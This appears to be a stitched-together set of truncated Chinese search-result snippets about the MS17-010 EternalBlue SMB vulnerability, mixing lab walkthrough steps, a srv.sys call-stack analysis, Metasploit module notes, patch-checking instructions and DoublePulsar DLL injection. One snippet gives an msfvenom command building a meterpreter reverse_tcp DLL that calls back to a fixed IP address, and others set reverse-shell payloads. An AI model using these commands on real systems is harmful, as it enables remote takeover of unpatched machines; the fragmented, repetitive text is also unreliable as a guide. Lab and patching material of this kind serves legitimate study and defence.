【受害方】虚拟机xp(x86):192.168.0.107 第一步:在上一个实验中攻击方控制了受害方,然后可以上传并执行木马程序,这属于后渗透测试的范畴了,通过下面的实验,简单展示一下。 注意:本次实验采用的是2台windows系统 第二步:搜索中奖主机【这里指的是中了木马的xp主机】 第三步:查看受害者的桌面,这里就是截屏。
溢出分析 我们分析的srv.sys文件版本是6.1.7601.17514_x86。漏洞代码是利用srv!SrvSmbOpen2函数被触发。函数的调用栈如下 00 94527bb4 82171149 srv!SrvSmbOpen2 -> SrvOs2FeaListSizeToNt() 01 94527bc8 821721b8 srv!ExecuteTransaction+0x101 02 94527c00 8213b496 srv!SrvSmbTransactionSecondary+0x2c5 03 ...
exploit 函数,攻击入口 首先调用 check 函数进行目标漏洞检测(使用auxiliary/scanner/smb/smb_ms17_010模块),然后判断目标系统架构(不支持 X86),如果漏洞存在,则根据目标系统版本进行 exploit modules/exploits/windows/smb/ms17_010_eternalblue.rb
第一步:管理员权限 -->运行补丁检查提取补丁信息.batbat文件里的内容(请忽略横线)---sfc /scannow---第二步:打开:--> C:Windows/Logs/CBS/CBS.txt第三步(异常处理):1\如果第二步提示,无权限。在CBS.log 上右键 -->属性 -->安全-->高级-->选中当前用户的 用户组-->更改权限-->勾...
首先调用 check 函数进行目标漏洞检测(使用auxiliary/scanner/smb/smb_ms17_010模块),然后判断目标系统架构(不支持 X86),如果漏洞存在,则根据目标系统版本进行 exploit modules/exploits/windows/smb/ms17_010_eternalblue.rb 原创稿件征集 征集原创技术文章中,欢迎投递 ...
“x86”代表补丁适用于32位的操作系统 “chs”代表补丁适用于中文版本的操作系统(如果没有区分,默认为中文) “enu”代表补丁适用于英文版本的操作系统 三、 首先检查补丁是否安装,如果已安装就不需要再执行步骤四安装。 1. 打开“开始栏”并点击“控制面板” 点击“添加或者删除程序” 勾选“显示更新” 下拉检查对...
1.3.5 注入s.dll木马程序 在windows7(x86)攻击机中使用Doublepulsar模块向靶机注入木马程序,具体过程如以下各图所示,除特殊说明外,其它配置保持默认即可。 操作系统选择64位的,如下图所示。 指定木马程序,如下图所示。 1.3.6 Kali反弹shell结果 结果如以下各图所示。
当前测试版本windows 7 sp1 x86 1. 生成后门文件 利用msfvenom生成dll文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.100.119.27 LPORT=12121 -f dll >17010.dll image 2. 打开监听 选择对应的payload开监听就完事儿了 image 3. 原生 py 打 17010 ...
我们分析的srv.sys文件版本是6.1.7601.17514_x86。漏洞代码是利用srv!SrvSmbOpen2函数被触发。函数的调用栈如下 1 2 3 4 5 6 7 8 00 94527bb4 82171149 srv!SrvSmbOpen2 -> SrvOs2FeaListSizeToNt() 01 94527bc8 821721b8 srv!ExecuteTransaction+0x101 ...
第一种交互式shellpayload设置方法:set payload windows/meterpreter/reverse_tcp(注意:此处的payload里面去掉X86,不然链接不成功) 第二种反弹式shellpayload设置方法:set payload windows/shell/reverse_tcp(注意:此处的payload里面去掉X86,不然链接不成功) 如下图所示,攻击成功,反弹出shell ,可移执行windows 7 的系统命...